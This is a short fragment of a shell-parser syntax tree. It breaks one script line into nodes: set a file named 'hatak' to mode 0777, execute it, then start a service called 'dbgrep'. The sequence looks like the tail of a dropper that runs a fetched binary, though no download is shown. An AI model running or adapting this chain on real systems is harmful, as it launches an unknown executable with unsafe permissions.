  OperatorNode(lineno=15, op=';', pos=(1739, 1740)),
  CommandNode(lineno=15, pos=(1741, 1757), parts=[
    WordNode(lineno=15, pos=(1741, 1746), word='chmod'),
    WordNode(lineno=15, pos=(1747, 1751), word='0777'),
    WordNode(lineno=15, pos=(1752, 1757), word='hatak'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1757, 1758)),
  CommandNode(lineno=15, pos=(1759, 1766), parts=[
    WordNode(lineno=15, pos=(1759, 1766), word='./hatak'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1766, 1767)),
  CommandNode(lineno=15, pos=(1768, 1788), parts=[
    WordNode(lineno=15, pos=(1768, 1775), word='service'),
    WordNode(lineno=15, pos=(1776, 1782), word='dbgrep'),
    WordNode(lineno=15, pos=(1783, 1788), word='start'),
  ]),
])
